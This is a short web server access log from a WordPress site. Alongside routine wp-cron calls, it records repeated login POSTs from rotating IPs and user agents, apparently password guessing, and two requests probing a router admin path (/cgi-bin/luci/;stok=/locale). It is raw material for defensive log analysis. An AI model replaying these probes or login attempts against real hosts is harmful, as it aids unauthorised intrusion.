36.133.115.36 - - [20/Oct/2025:15:32:22 +0800] "POST /wp-cron.php?doing_wp_cron=1760945542.6706690788269042968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.149.169.120 - - [20/Oct/2025:15:32:22 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
36.133.115.36 - - [20/Oct/2025:15:36:48 +0800] "POST /wp-cron.php?doing_wp_cron=1760945808.5889840126037597656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.154.194.72 - - [20/Oct/2025:15:36:48 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [20/Oct/2025:15:41:14 +0800] "POST /wp-cron.php?doing_wp_cron=1760946074.9284451007843017578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
132.148.72.207 - - [20/Oct/2025:15:41:14 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
36.133.115.36 - - [20/Oct/2025:15:42:29 +0800] "POST /wp-cron.php?doing_wp_cron=1760946149.0050959587097167968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
5.253.86.217 - - [20/Oct/2025:15:42:29 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
5.253.86.217 - - [20/Oct/2025:15:42:30 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [20/Oct/2025:15:45:40 +0800] "POST /wp-cron.php?doing_wp_cron=1760946340.9364509582519531250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.74.118.39 - - [20/Oct/2025:15:45:40 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
36.133.115.36 - - [20/Oct/2025:15:47:34 +0800] "POST /wp-cron.php?doing_wp_cron=1760946454.1688320636749267578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [20/Oct/2025:15:47:35 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [20/Oct/2025:15:50:12 +0800] "POST /wp-cron.php?doing_wp_cron=1760946612.4651091098785400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
